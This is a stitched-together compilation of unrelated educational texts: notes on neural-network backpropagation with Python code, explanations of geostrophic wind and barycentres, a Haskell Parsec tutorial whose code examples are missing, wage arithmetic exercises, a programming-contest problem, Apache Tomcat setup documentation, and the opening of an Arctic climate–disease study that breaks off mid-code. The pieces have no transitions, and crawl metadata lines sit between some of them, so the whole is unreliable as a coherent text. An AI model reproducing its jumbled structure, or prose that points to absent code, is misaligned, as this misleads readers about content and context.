The rediscovery of the backpropagation algorithm was probably the main reason behind the repopularisation of neural networks after the publication of "Learning Internal Representations by Error Propagation" in 1986 (though backpropagation itself dates from 1974). The original network utilised multiple layers of weighted-sum units of the type <math>f = g(w'x + b)</math>, where <math>g</math> was a sigmoid function or logistic function such as used in logistic regression. Training was done by a form of stochastic steepest gradient descent. The employment of the chain rule of differentiation in deriving the appropriate parameter updates results in an algorithm that seems to 'backpropagate errors', hence the nomenclature. However, it is essentially a form of gradient descent. Determining the optimal parameters in a model of this type is not trivial, and steepest gradient descent methods cannot be relied upon to give the solution without a good starting point. In recent times, networks with the same architecture as the backpropagation network are referred to as Multi-Layer Perceptrons. This name does not impose any limitations on the type of algorithm used for learning.
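A sketch of such a network (an illustrative Python toy, not the original 1986 formulation): multiple layers of weighted-sum units with a logistic g, trained by gradient descent with chain-rule updates. XOR is used as the task because a single-layer perceptron cannot represent it.

```python
import math, random

# A minimal multi-layer perceptron: units compute g(w'x + b) with g the
# logistic function, and training uses gradient descent whose updates are
# derived via the chain rule ("backpropagating errors").
def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def train_xor(epochs=5000, lr=0.5, seed=1):
    rng = random.Random(seed)
    # weights: 2 inputs -> 2 hidden units -> 1 output
    w1 = [[rng.uniform(-1, 1) for _ in range(2)] for _ in range(2)]
    b1 = [0.0, 0.0]
    w2 = [rng.uniform(-1, 1) for _ in range(2)]
    b2 = 0.0
    data = [([0, 0], 0), ([0, 1], 1), ([1, 0], 1), ([1, 1], 0)]
    losses = []
    for _ in range(epochs):
        total = 0.0
        for x, y in data:
            # forward pass
            h = [sigmoid(w1[j][0] * x[0] + w1[j][1] * x[1] + b1[j]) for j in range(2)]
            o = sigmoid(w2[0] * h[0] + w2[1] * h[1] + b2)
            total += (o - y) ** 2
            # backward pass: chain rule through the logistic units
            do = 2 * (o - y) * o * (1 - o)
            for j in range(2):
                dh = do * w2[j] * h[j] * (1 - h[j])
                w2[j] -= lr * do * h[j]
                w1[j][0] -= lr * dh * x[0]
                w1[j][1] -= lr * dh * x[1]
                b1[j] -= lr * dh
            b2 -= lr * do
        losses.append(total)
    return losses

losses = train_xor()
```

As the text notes, convergence depends on the starting point; the safe claim is only that the squared error decreases from its initial value during training.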
The backpropagation network generated much enthusiasm at the time and there was much controversy about whether such learning could be implemented in the brain or not, partly because a mechanism for reverse signalling was not obvious at the time, but most importantly because there was no plausible source for the 'teaching' or 'target' signal.
A. K. Dewdney, a former Scientific American columnist, wrote in 1997, “Although neural nets do solve a few toy problems, their powers of computation are so limited that I am surprised anyone takes them seriously as a general problem-solving tool.” (Dewdney, p.82)
Arguments against Dewdney's position are that neural nets have been successfully used to solve many complex and diverse tasks, ranging from autonomously flying aircraft to detecting credit card fraud.
Technology writer Roger Bridgman commented on Dewdney's statements about neural nets: "Neural networks, for instance, are in the dock not only because they have been hyped to high heaven, (what has not?) but also because you could create a successful net without understanding how it worked: the bunch of numbers that captures its behaviour would in all probability be 'an opaque, unreadable table...valueless as a scientific resource'. In spite of his emphatic declaration that science is not technology, Dewdney seems here to pillory neural nets as bad science when most of those devising them are just trying to be good engineers. An unreadable table that a useful machine could read would still be well worth having."
- Artificial neural network
- Biologically-inspired computing
- Neural network software
- Predictive analytics
- Radial basis function network
- Support vector machine
- Tensor product network
- 20Q is a neural network implementation of the 20 questions game
- Abdi, H., Valentin, D., Edelman, B.E. (1999). Neural Networks. Thousand Oaks: Sage.
- Anderson, James A. (1995). An Introduction to Neural Networks. MIT Press. ISBN 0-262-01144-1.
- Arbib, Michael A. (Ed.) (1995). The Handbook of Brain Theory and Neural Networks.
- Alspector, U.S. Patent 4,874,963 "Neuromorphic learning networks". October 17, 1989.
- Agre, Philip E.; et al. (1997). Comparative Cognitive Robotics: Computation and Human Experience. Cambridge University Press. ISBN 0-521-38603-9. p. 80.
- Bar-Yam, Yaneer (2003). Dynamics of Complex Systems, Chapter 2.
- Bar-Yam, Yaneer (2003). Dynamics of Complex Systems, Chapter 3.
- Bar-Yam, Yaneer (2005). Making Things Work. See chapter 3.
- Bertsekas, Dimitri P. (1999). Nonlinear Programming.
- Bertsekas, Dimitri P. & Tsitsiklis, John N. (1996). Neuro-dynamic Programming.
- Boyd, Stephen & Vandenberghe, Lieven (2004). Convex Optimization.
- Dewdney, A. K. (1997). Yes, We Have No Neutrons: An Eye-Opening Tour through the Twists and Turns of Bad Science. Wiley, 192 pp. See chapter 5.
- Fukushima, K. (1975). "Cognitron: A Self-Organizing Multilayered Neural Network". Biological Cybernetics. 20: 121–136.
- Frank, Michael J. (2005). "Dynamic Dopamine Modulation in the Basal Ganglia: A Neurocomputational Account of Cognitive Deficits in Medicated and Non-medicated Parkinsonism". Journal of Cognitive Neuroscience. 17: 51–72.
- Gardner, E.J., & Derrida, B. (1988). "Optimal storage properties of neural network models". Journal of Physics A. 21: 271–284.
- Krauth, W., & Mezard, M. (1989). "Storage capacity of memory with binary couplings". Journal de Physique. 50: 3057–3066.
- Maass, W., & Markram, H. (2002). "On the computational power of recurrent circuits of spiking neurons". Journal of Computer and System Sciences. 69(4): 593–616.
- MacKay, David (2003). Information Theory, Inference, and Learning Algorithms.
- Mandic, D. & Chambers, J. (2001). Recurrent Neural Networks for Prediction: Architectures, Learning algorithms and Stability. Wiley.
- Minsky, M. & Papert, S. (1969). An Introduction to Computational Geometry. MIT Press.
- Muller, P. & Insua, D.R. (1995). "Issues in Bayesian Analysis of Neural Network Models". Neural Computation. 10: 571–592.
- Reilly, D.L., Cooper, L.N. & Elbaum, C. (1982). "A Neural Model for Category Learning". Biological Cybernetics. 45: 35–41.
- Rosenblatt, F. (1962). Principles of Neurodynamics. Spartan Books.
- Sutton, Richard S. & Barto, Andrew G. (1998). Reinforcement Learning: An Introduction.
- Wilkes, A.L. & Wade, N.J. (1997). "Bain on Neural Networks". Brain and Cognition. 33: 295–305.
- Wasserman, P.D. (1989). Neural computing theory and practice. Van Nostrand Reinhold.
- Jeffrey T. Spooner, Manfredi Maggiore, Raúl Ordóñez, and Kevin M. Passino, Stable Adaptive Control and Estimation for Nonlinear Systems: Neural and Fuzzy Approximator Techniques, John Wiley and Sons, NY, 2002.
- ↑ Arbib, p.666
Yes, it is because of that:
1 - The wind must pick up speed as long as its angle is less than 90° to the pressure gradient. This is because it has a net force in its direction of motion, and $F=ma$, so it has acceleration towards the low pressure. The Coriolis "force", by contrast, being always 90° from the movement, cannot accelerate/affect the magnitude, only change the direction.
2 - And Coriolis is $f\times v$, meaning the Coriolis force indeed increases as velocity increases.
As the process continues, the change in direction means less and less of the PGF is a component that changes the magnitude of velocity, and more and more of it is normal to motion... and so opposing the Coriolis.
If they didn't cancel each other out when the parcel reached 90° to the PGF, then the parcel would still have a directional acceleration... meaning it then again becomes not 90° to the PGF.
If PGF were stronger/it is less than 90° to PGF, it would further accelerate in velocity, and so thus further increase Coriolis... and be directed back to perpendicular.
If Coriolis were somehow stronger/it somehow got beyond 90°, the PGF would then start to have a component that decelerates the velocity. Which would decrease the Coriolis counteracting it, and so pull it back (left in the NH) towards perpendicular.
So the situation is entirely restorative/stable. It can only be at balance when they cancel each other out, and the motion is at that 90° angle (unless there are additional forces). When it somehow isn't in that balanced situation, the forces work to accelerate/push it back towards that situation.
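To put rough numbers on this balance (the values below are typical assumed figures, not taken from the text): setting the pressure-gradient force per unit mass equal to the Coriolis term f·v gives the geostrophic wind speed.

```python
import math

# A rough numerical sketch of geostrophic balance: the Coriolis parameter
# is f = 2 * Omega * sin(latitude), and in balance the pressure-gradient
# force per unit mass equals f * v, so v_g = (1 / (rho * f)) * dP/dn.
# All values are typical assumed figures for illustration.
omega = 7.292e-5            # Earth's rotation rate, rad/s
rho = 1.2                   # near-surface air density, kg/m^3
lat = math.radians(45)
f = 2 * omega * math.sin(lat)   # Coriolis parameter at 45 degrees
dpdn = 1e-3                 # pressure gradient: 1 hPa per 100 km, in Pa/m
v_g = dpdn / (rho * f)      # geostrophic wind speed, m/s (roughly 8 m/s)
```

This shows why mid-latitude winds of order 10 m/s accompany quite modest pressure gradients.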
With a "sudden" low pressure, nearby parcels would not have the time/distance to undergo this process and accelerate/change direction enough before reaching the low. But typically atmospheric pressure changes are gradual changes, so basically the change in motion are so gradual that the motion at any time is essentially geostrophic at any moment.
Rapid pressure changes can and do still lead to local ageostrophic motion, where the change is of such speed and magnitude that the Coriolis force hasn't responded yet, and so there is a more meaningful component of motion out of balance (and so the motion is more non-perpendicular to the PGF).
And other forces... in particular friction at lower levels of the atmosphere... do alter the balance. Friction continually decelerating motion leads to a result where the path is consistently a bit less than 90°, towards the low pressure, which leads (apart from other factors) to filling of the low pressure over time. Particularly strong persistent low pressure can also result in a flow nearby that must turn so rapidly that there is a significant centrifugal "force" as well... this extra force isn't degenerative like friction is, but leads to a different balance instead, the gradient wind balance, with a somewhat lower velocity compared to geostrophic balance.
An Introduction to the Parsec Library
21 Jan 2014
The process of compiling or interpreting programs requires, as one of its steps, parsing the source code and structuring it. More specifically, we have a step to convert a string into a set of tokens, called lexical analysis, which is carried out by a lexer or tokenizer.
After that, we structure those tokens in such a way that encodes the meaning of these tokens, for example as an abstract syntax tree (AST). This step is called parsing and is carried out by a parser.
The parsec library
Parser combinators are high-order functions that combine smaller combinators (parsers) to build more complex ones. This resembles the idea of context free grammars (CFG), which we talked about in a previous post, where we have productions of the form\[S \rightarrow A \mid B\]
Here, \(S\) can be formed by either from \(A\) or \(B\), which in turn, can be other productions or terminals.
The parsec library is an implementation of a parser combinator in Haskell. We talked about combinators in Haskell previously (in Portuguese).
Parsec vs. Bison/Yacc/Antlr
Bison, Yacc and Antlr are not actual parsers, but rather parser generators. They take a grammar file and generate parsers for the languages that can be described by those grammars.
Parsec, on the other hand, is a parser that you write yourself.
In this post we’ll go through several basic concepts of the parsec library, using as the main reference, the book Real World Haskell, Chapter 16.
The source code for all the examples to follow can be found on the blog’s github repository.
The basic idea of a parser is that it takes an input (for example, a string), it consumes the characters of this string until it’s done with what it’s supposed to parse and then pass the remaining (unparsed) string along, which might be used as input to subsequent parsers.
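As a language-neutral sketch of this consume-and-pass-along idea (Python, with illustrative names; this is not the parsec API itself):

```python
# A sketch of the basic parser idea: a parser takes a string, consumes
# part of it, and returns the parsed token plus the remaining (unparsed)
# string, which can feed subsequent parsers. Names are illustrative.
def char(expected):
    def parser(s):
        if s and s[0] == expected:
            return s[0], s[1:]   # (token, rest of the input)
        raise ValueError(f"expected {expected!r} at {s!r}")
    return parser

parse_a = char("a")
token, rest = parse_a("abc")     # consumes 'a', passes "bc" along
```

Chaining parsers is then just feeding each one the `rest` returned by the previous one.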
One of the simplest parsers is the one that only consumes a single specific character. Parsec already provides one, named char, so let's write our own version that parses the letter 'a'.
To test our parser with an input, we use the parse function from the library.
This function takes as input a parser, a source name and the actual input. The source name parameter is not important for us now, so we can pass the empty string. Let’s write a simple wrapper to avoid boilerplate:
We can now test our parser with same sample inputs:
It extracts the first character of the input string if it's the 'a' character, otherwise it throws an error. If we want to match any char, there's also the function anyChar. Running it with the same examples:
Note that it doesn’t fail for strings starting with
'b'. So far our parsers only match one character, so for example, the string
"ab", it only returns the first character.
We can write a parser for strings too. There's the string combinator, but let's develop our own and show how we can combine combinators to form new ones. There's the many combinator, which applies the combinator passed as argument until it fails. Thus, we can write a string parser as a combination of many and anyChar.
Now let’s try it with the string
More useful than matching all characters is matching all except some, so we know when to stop parsing. For that, we can use noneOf instead of anyChar. It takes a list of characters as parameter and matches any character that is not on that list.
Let’s now write a
wordParser, which keeps parsing all characters until it finds an whitespace:
Let’s try it on the most classical string example:
Note that our parsers are throwing away all the unparsed strings. How can we parse the remaining, unparsed string?
We’ve talked about Functors and Monads before, but not about Applicatives functors.
Intuitively, they are a structure in between Functors and Monads, that is, they’re more complex and general than Functors but less than Monads. We can also make the analogy of wrappers that we did for monads.
Originally, the Parsec library was written with Monads in mind, but Applicative functors were introduced after that and using them to write parsers usually leads to more clear syntax. So, in this post, we’ll use the applicative flavor to write our parsers.
Here, we’ll only provide an overview of some of the main applicative operators. For further details, the book Learn You a Haskell for Great Good has a nice introduction to Applicatives.
Operators cheat sheet: we can use the Maybe type to illustrate the main applicative operators, since it implements an applicative functor.
- (<*>) Unwrap the contents of both sides, combine them and wrap again.
- (*>) Unwrap the contents of both sides, but discard the result on the left.
- (<*) Unwrap the contents of both sides, but discard the result on the right.
- (<$>) Unwrap the contents of the right, combine it with the left argument and wrap the result.
- (<$) Unwrap the contents of the right, but only wrap the one to the left.
This analogy of wrappers applied to parsers is not as natural though. In this case, we can think of unwrapping as executing the parser, by consuming the input and wrapping the result as getting the parsed token. The unparsed string is always carried over from parser to parser.
Hopefully with the next examples this will become clearer:
Parsing the second word
If we are to get the token from the second parser instead of the first, we need to execute both parsers but ignore the result of the first. Thus, we can use the operator (*>) to obtain something like:
This won’t quite work because the first parser doesn’t consume the whitespace, so the second parser will stop before consuming anything. We can fix that by consuming the whitespace:
So let’s write:
and now we can test:
Parsing two words
We can also return both tokens if we use the operator (<*>) and then combine them into a list:
Parsing multiple words
Generalizing, we can parse multiple words with the aid of the many combinator. We could actually write this using the sepBy1 parser, which parses a list of tokens separated by a separator and requires the list to have at least one element:
Simple CSV parser
With what we’ve seen so far, we can write a very basic CSV parser in 4 lines of code.
Note that it doesn't handle some corner cases, like escaped commas within cells. For a full example, refer to the Real World Haskell book.
Recall that in Context Free Grammars, we can have production rules of the type:\[S \rightarrow A \mid B\]
which means that S can be generated either from \(A\) or \(B\). In Parsec, we can express this choice using the (<|>) operator. Let's write a simple parser that accepts either of two animal names.
Testing on some inputs:
Let’s write another example with different animal names:
and try again with the input "cat":
The parser failed because the strings have a common prefix. It started matching the camel parser, but in doing so it also consumed the "ca" characters, and then it failed to match the cat parser.
The try combinator
To avoid this problem, there's the try combinator, which makes a parser not consume its input if it fails to match:
which works as expected:
We can see that it's straightforward to convert a standard context free grammar into a Haskell program using Parsec.
So far our parsers have only returned strings and lists of strings. We can use data types to structure our parsed data in a way that is easier to evaluate later.
For our example, we'll build a very simple parser for expressions that only contain the + and - binary operators, where terminals are all integers and all binary expressions are surrounded by parentheses, so we don't have to handle precedence. For example, "(1+2)" is a valid expression, while "1+2" is invalid (no parenthesis).
The first thing we want to do is to define our data types. Our number type, TNumber, is just an alias to Int. Our operator type, TOperator, can be one of addition (TAdd) or subtraction (TSubtract). Finally, the expression type is either a binary node (TNode) or a number.
From what we’ve seen so far, it’s not very complicated to write parsers for
For the expression we have two choices. Either we parse another expression enclosed in parenthesis or we parse a terminal. In the first case, we call the
binaryExpressionParser which looks for the left expression, the operator and then the right expression.
And that’s it! We can now run an example with a valid expression:
The advantage of having this AST is that it’s now very simple to evaluate:
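As an illustration of how simple the evaluation becomes (a Python analogue with tuples standing in for the Haskell constructors TNode/TAdd/TSubtract; this is not the post's original code):

```python
# An illustrative evaluator for the small expression AST described above,
# with Python tuples standing in for the Haskell constructors: an
# expression is either a plain integer (terminal) or an (op, left, right)
# binary node. Evaluation is a straightforward recursive walk.
def evaluate(expr):
    if isinstance(expr, int):      # terminal: a number
        return expr
    op, left, right = expr         # binary node
    if op == "add":
        return evaluate(left) + evaluate(right)
    if op == "subtract":
        return evaluate(left) - evaluate(right)
    raise ValueError(f"unknown operator: {op}")

# ((1+2)-4) as a nested AST
ast = ("subtract", ("add", 1, 2), 4)
```

The recursion mirrors the shape of the grammar, which is exactly the payoff of parsing into an AST first.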
And the final test:
It works! We implemented a simple parser and interpreter for a very limited arithmetic expression language. There are much better tools to do expression parsing, but they are out of the scope of this post.
We’ve learned the basics of the Parsec library and built some non-trivial parsers gluing together basic parsers using combinators. We even started scratching the parsing of programming languages by writing a parser for arithmetic expressions.
The Parsec applications presented in the Real World Haskell book are great. I felt that the content was a bit hard to follow, but writing helped me get a better understanding of the subject.
I know they will be orbiting about a common center of mass, i.e. the
barycenter. But, do the velocities have to be equal in magnitude and
opposite in direction (normal to R when R is their distance from each
other) for the orbit to be stable?
The orbital velocities do not have to be, and in general are not, equal in magnitude. What is equal is the angular velocity, that is the angular rate (e.g., in $rad/sec$) that two bodies will be orbiting their common barycenter. The orbital radius, $r$, orbital velocity, $v$, and angular velocity, $\omega$, are related by the equation
$$\omega = v/r$$
Note that these are all scalar quantities and $v$ can be thought of as the component of the velocity vector which is perpendicular to $r$. Since conservation of angular momentum implies that $\omega$ remain constant for each body, individually, then we know that $v/r$ must also be constant which implies that bodies which orbit farther away from the barycenter must necessarily be orbiting faster and vice versa.
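A small numeric sketch of the above (round figures loosely based on the Earth and Moon, assumed for illustration): each body orbits the barycenter at a radius inversely proportional to its mass, both share the same angular velocity, and the farther (lighter) body moves faster.

```python
import math

# Two bodies orbiting their common barycenter. Each orbits at a radius
# inversely proportional to its mass (m1*r1 = m2*r2), both share the same
# angular velocity omega, and orbital speed is v = omega * r, so the
# lighter, farther body moves faster. Round Earth-Moon-like figures.
G = 6.674e-11                  # gravitational constant
m1, m2 = 5.97e24, 7.35e22      # masses, kg
d = 3.84e8                     # separation, m
r1 = d * m2 / (m1 + m2)        # heavier body's distance from barycenter
r2 = d * m1 / (m1 + m2)        # lighter body's distance from barycenter
omega = math.sqrt(G * (m1 + m2) / d**3)   # shared angular velocity, rad/s
v1, v2 = omega * r1, omega * r2           # orbital speeds, m/s
```

With these numbers the lighter body moves at roughly 1 km/s while the heavier one drifts at only about 12 m/s, even though v/r is identical for both.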
Now of course that simplifying explanation works for two bodies. Once you throw in more than two bodies, things become more complicated and the barycenter can move around, causing more complex motions.
I think, if the velocity of one mass were to vary with respect to the
other it would create a moving barycenter in which the two masses
would collide or throw one another out of the orbit
This is a subtly different question. If one of the two masses had a varying orbital velocity, that would imply it was gaining or losing energy by some mechanism. This can occur through things like tidal interactions, as it does for our Earth and Moon. As stated above, the angular velocity must remain constant, which implies that the body whose velocity is changing must also migrate towards or away from the barycenter, potentially resulting in a collision or escape. Since the Moon's orbital velocity is being sped up through tidal interactions, it is moving farther away as a result. Another example might be two black holes emitting gravitational waves as they orbit, which carries energy away and shrinks their orbital separation, causing them to get closer together until they collide.
A wage is an amount paid to an employee at a certain rate. It may be calculated as a fixed task based amount, or at an hourly rate, or based on the quantity of work done (e.g. piecemeal work). So if you are paid per hour, your wage will increase the more hours you work.
In contrast, a salary is a fixed income that is based on a fixed number of working hours. People normally sign a contract with an agreed salary amount before they start working with a company. An employee may receive a weekly, fortnightly or monthly salary. The employee will receive the same amount of income each time period, regardless of whether they work more or less hours, as it is thought this will be averaged out.
A salary is normally written as an annual amount. However, it can be helpful to calculate how much money you'll receive each week, to help you set a budget for your spending. Similarly, you may want to work out how much money you will earn in a year based on the amount you get paid fortnightly. So let's look at some examples of how to solve questions involving salaries and wages.
Beth worked for $281$ days in the year, with an average of $7$ hours a day. For $62\%$ of those hours, she was paid $\$15$ per hour, and for the rest she was paid $\$25$ per hour.
A) For how many hours was she paid $\$15$ per hour? Give your answer to $1$ decimal place.
Think: How many hours does she work in a year?
Do: $281 \times 7 = 1967$ hours that she works in a year, so she was paid $\$15$ for $0.62 \times 1967 = 1219.5$ hours (to $1$ decimal place).
B) For how many hours was she paid $\$25$ per hour? Give your answer to $1$ decimal place.
Think: She was earning $\$15$ for $1219.5$ hours, and $\$25$ for the rest of the year.
Do: $1967 - 1219.5 = 747.5$ hours
C) What was her total income for the year (to the nearest cent)?
Think: Multiply each block of hours by its hourly rate.
Do: $1219.5 \times \$15 + 747.5 \times \$25 = \$36980.00$
D) What was her average weekly income for the year (to the nearest cent)?
Think: There are $52$ weeks in a year.
Do: $\$36980.00 \div 52 \approx \$711.15$
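The worked example above can be checked in a few lines (Python, for illustration):

```python
# Checking Beth's example: hours at each rate, total annual income, and
# average weekly income over 52 weeks.
total_hours = 281 * 7                        # 1967 hours in the year
hours_at_15 = round(0.62 * total_hours, 1)   # part A: 1219.5 hours
hours_at_25 = total_hours - hours_at_15      # part B: 747.5 hours
annual_income = hours_at_15 * 15 + hours_at_25 * 25   # part C: $36980.00
weekly_income = round(annual_income / 52, 2)          # part D: $711.15
```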
Han earned $\$53030$ in one year, and worked an average of $25$ hours per week.
What hourly wage did he earn, to the nearest cent?
How much would his annual salary have to increase by for his equivalent hourly wage to increase by $\$4$?
Han's annual salary is $\$32630$. Calculate his fortnightly pay after receiving a $5\%$ pay rise. Write your answer correct to two decimal places.
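These three parts can be checked directly (Python, for illustration; it assumes 52 weeks, i.e. 26 fortnights, in a year):

```python
# Checking Han's example: hourly wage from an annual salary, the annual
# increase equivalent to a $4/hour raise, and fortnightly pay after a 5%
# rise on a $32630 salary.
hours_per_year = 25 * 52                        # 1300 hours worked
hourly_wage = round(53030 / hours_per_year, 2)  # $40.79 per hour
salary_increase = 4 * hours_per_year            # $4/hour more -> $5200/year
fortnightly_pay = round(32630 * 1.05 / 26, 2)   # $1317.75 per fortnight
```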
Donald is a fence builder. He wants to build a fence that is $N - 1$ meters long. He needs a fence post every meter along the fence, which means he needs $N$ fence posts. Donald has $K$ poles of varying lengths that he wants to use as fence posts. The fence posts must have the same lengths, and be as long as possible. Also, the parts of the poles that are not used for the posts must not be longer than the ones used for the posts. Donald can cut the poles as many times as he wants, and at any position he wants. However, cutting a pole takes time, so he wants to make as few cuts as possible while achieving his other goals.
How many cuts does Donald have to make to get the fence posts for his fence?
The first line has two space-separated integers, $K$ and $N$. The second line consists of $K$ space-separated integers $p_1$, $p_2$, …, $p_ K$, where $p_ i$ represents the length of the $i$th pole.
Output the minimum number of cuts needed to build the fence.
$1 \leq K \leq N \leq 10\, 000$
$1 \leq p_ i \leq 10\, 000$
|Sample Input 1||Sample Output 1|
1 2 3
|Sample Input 2||Sample Output 2|
2 5 4 2 | <urn:uuid:75a879a3-8bad-4a24-a42e-b837589b0107> | CC-MAIN-2023-14 | https://ru.kattis.com/courses/T-414-AFLV/aflv21/assignments/hibhiv/problems/fence2 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943625.81/warc/CC-MAIN-20230321033306-20230321063306-00210.warc.gz | en | 0.960821 | 346 | 2.546875 | 3 |
Table of Contents
For administrators and web developers alike, there are some important bits of information you should familiarize yourself with before starting out. This document serves as a brief introduction to some of the concepts and terminology behind the Tomcat container. As well, where to go when you need help.
In the course of reading these documents, you will run across a number of terms; some specific to Tomcat, and others defined by the Servlet and JSP specifications.
- Context - In a nutshell, a Context is a web application.
That is it. If you find any more terms we need to add to this section, please do let us know.
Directories and Files
These are some of the key tomcat directories:
- /bin - Startup, shutdown, and other scripts. The
*.shfiles (for Unix systems) are functional duplicates of the
*.batfiles (for Windows systems). Since the Win32 command-line lacks certain functionality, there are some additional files in here.
- /conf - Configuration files and related DTDs. The most important file in here is server.xml. It is the main configuration file for the container.
- /logs - Log files are here by default.
- /webapps - This is where your webapps go.
CATALINA_HOME and CATALINA_BASE
Throughout the documentation, there are references to the two following properties:
CATALINA_HOME: Represents the root of your Tomcat
installation, for example
CATALINA_BASE: Represents the root of a runtime
configuration of a specific Tomcat instance. If you want to have
multiple Tomcat instances on one machine, use the
If you set the properties to different locations, the CATALINA_HOME location
contains static sources, such as
.jar files, or binary files.
The CATALINA_BASE location contains configuration files, log files, deployed
applications, and other runtime requirements.
Why Use CATALINA_BASE
By default, CATALINA_HOME and CATALINA_BASE point to the same directory. Set CATALINA_BASE manually when you require running multiple Tomcat instances on one machine. Doing so provides the following benefits:
Easier management of upgrading to a newer version of Tomcat. Because all
instances with single CATALINA_HOME location share one set of
.jarfiles and binary files, you can easily upgrade the files to newer version and have the change propagated to all Tomcat instances using the same CATALIA_HOME directory.
Avoiding duplication of the same static
The possibility to share certain settings, for example the
setenvshell or bat script file (depending on your operating system).
Contents of CATALINA_BASE
Before you start using CATALINA_BASE, first consider and create the directory tree used by CATALINA_BASE. Note that if you do not create all the recommended directories, Tomcat creates the directories automatically. If it fails to create the necessary directory, for example due to permission issues, Tomcat will either fail to start, or may not function correctly.
Consider the following list of directories:
bindirectory with the
Order of lookup: CATALINA_BASE is checked first; fallback is provided to CATALINA_HOME.
libdirectory with further resources to be added on classpath.
Recommended: Yes, if your application depends on external libraries.
Order of lookup: CATALINA_BASE is checked first; CATALINA_HOME is loaded second.
logsdirectory for instance-specific log files.
webappsdirectory for automatically loaded web applications.
Recommended: Yes, if you want to deploy applications.
Order of lookup: CATALINA_BASE only.
workdirectory that contains temporary working directories for the deployed web applications.
tempdirectory used by the JVM for temporary files.
We recommend you not to change the
However, in case you require your own logging implementation, you can
tomcat-juli.jar file in a CATALINA_BASE location
for the specific Tomcat instance.
We also recommend you copy all configuration files from the
CATALINA_HOME/conf directory into the
CATALINA_BASE/conf/ directory. In case a configuration file
is missing in CATALINA_BASE, there is no fallback to CATALINA_HOME.
Consequently, this may cause failure.
At minimum, CATALINA_BASE must contain:
confdirectory. Otherwise, Tomcat fails to start, or fails to function properly.
For advanced configuration information, see the RUNNING.txt file.
How to Use CATALINA_BASE
The CATALINA_BASE property is an environment variable. You can set it before you execute the Tomcat start script, for example:
- On Unix:
CATALINA_BASE=/tmp/tomcat_base1 bin/catalina.sh start
- On Windows:
CATALINA_BASE=C:\tomcat_base1 bin/catalina.bat start
This section will acquaint you with the basic information used during the configuration of the container.
All of the information in the configuration files is read at startup, meaning that any change to the files necessitates a restart of the container.
Where to Go for Help
While we've done our best to ensure that these documents are clearly written and easy to understand, we may have missed something. Provided below are various web sites and mailing lists in case you get stuck.
Keep in mind that some of the issues and solutions vary between the major versions of Tomcat. As you search around the web, there will be some documentation that is not relevant to Tomcat 8, but only to earlier versions.
- Current document - most documents will list potential hangups. Be sure to fully read the relevant documentation as it will save you much time and effort. There's nothing like scouring the web only to find out that the answer was right in front of you all along!
- Tomcat FAQ
- Tomcat WIKI
- Tomcat FAQ at jGuru
- Tomcat mailing list archives - numerous sites archive the Tomcat mailing lists. Since the links change over time, clicking here will search Google.
- The TOMCAT-USER mailing list, which you can subscribe to here. If you don't get a reply, then there's a good chance that your question was probably answered in the list archives or one of the FAQs. Although questions about web application development in general are sometimes asked and answered, please focus your questions on Tomcat-specific issues.
- The TOMCAT-DEV mailing list, which you can subscribe to here. This list is reserved for discussions about the development of Tomcat itself. Questions about Tomcat configuration, and the problems you run into while developing and running applications, will normally be more appropriate on the TOMCAT-USER list instead.
And, if you think something should be in the docs, by all means let us know on the TOMCAT-DEV list. | <urn:uuid:e3de090d-f52a-4fa9-a1ef-52afc16e396d> | CC-MAIN-2023-14 | http://biaozhanggui.com/docs/introduction.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945183.40/warc/CC-MAIN-20230323194025-20230323224025-00210.warc.gz | en | 0.840025 | 1,678 | 2.8125 | 3 |
Recognition of climate-sensitive infectious diseases is crucial for mitigating health threats from climate change. Recent studies have reasoned about potential climate sensitivity of diseases in the Northern/Arctic Region, where climate change is particularly pronounced. By linking disease and climate data for this region, we here comprehensively quantify empirical climate-disease relationships. Results show significant relationships of borreliosis, leptospirosis, tick-borne encephalitis (TBE), Puumala virus infection, cryptosporidiosis, and Q fever with climate variables related to temperature and freshwater conditions. These data-driven results are consistent with previous reasoning-based propositions of climate-sensitive infections as increasing threats for humans, with notable exceptions for TBE and leptospirosis. For the latter, the data imply decrease with increasing temperature and precipitation experienced in, and projected for, the Northern/Arctic Region. This study provides significant data-based underpinning for simplified empirical assessments of the risks of several infectious diseases under future climate change.
There are indications of climate change driving spatiotemporal shifts in incidence for certain diseases1,2,3,4,5. Identification of such climate-sensitive infections (CSIs) is crucial for mitigating climate-driven disease threats. In the Northern/Arctic Region, climate change is particularly rapid and severe1,2,6, as ecosystems change7,8 and animals move towards the North Pole3, bringing microorganisms new to the territories, some of which can cause infections in humans (i.e., zoonoses) and potentially outbreaks of varying magnitude, from local epidemics to pandemics. Previous studies have reasoned about potential CSIs, such as borreliosis and tick-borne encephalitis (TBE), based on theoretical, laboratory, and mainly local disease incidence indications9,10,11. However, it is unknown whether these sensitivity estimates are supported by empirical data for climate and disease outbreaks on a large scale, such as over the Northern/Arctic Region. Data-driven identification of emerging disease relationships to observed climate change can be used to test more qualitative, theoretical, and local climate-sensitivity hypotheses and implications towards more accurate, evidence-based, and potentially simplified assessments of disease threats in future scenarios.
In this study, we used synchronous climate and disease incidence data for the Northern/Arctic Region for such data-driven identification of observation-based disease co-variations with recent and ongoing climate change in the region. Disease data were compiled in a regional dataset for seven zoonotic diseases (borreliosis, tularemia, leptospirosis, Q fever, TBE, Puumala virus infection, cryptosporidiosis) caused by pathogenic microorganisms using different vectors in ecosystems to infect humans (Table 1). These data are all derived from diagnosed cases using laboratory confirmation, and cover six Northern/Arctic countries or country parts (Greenland, Iceland, Norway, Sweden, Finland, and parts of northern Russia), distributed across 32–86 regional districts with the longest disease records (from 1969 to 2016)12. Along with the disease data, we compiled synchronous data for 22 different climate variables, considering possible climate change impacts on host–pathogen systems13 and including several primary (bio)climate variables14. These include annual mean, maximum, and minimum monthly and seasonal temperature and precipitation, along with temperature and precipitation in the warmest, coldest, wettest, and driest quarter of each year. Monthly values of these climate variables were obtained from open-access high-resolution gridded datasets of the Climate Research Unit (CRU)15, and aggregated to the relevant spatiotemporal scale for linking with corresponding disease data.
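As detailed further in the Methods, gridded CRU values were aggregated to district scale by area-weighted averaging of the grid cells lying mostly within each district. The following minimal sketch illustrates that aggregation step; the function name, toy data, and call signature are assumptions for illustration, while the 50% inclusion rule follows the Methods description:

```python
import numpy as np

def district_mean(cell_values, cell_areas, frac_in_district, min_frac=0.5):
    """Area-weighted district average of a gridded climate variable.

    Hypothetical helper: grid cells with less than `min_frac` of their area
    inside the district are excluded (the paper's 50% inclusion rule); the
    remaining cells are averaged with their areas as weights.
    """
    v = np.asarray(cell_values, dtype=float)
    w = np.asarray(cell_areas, dtype=float)
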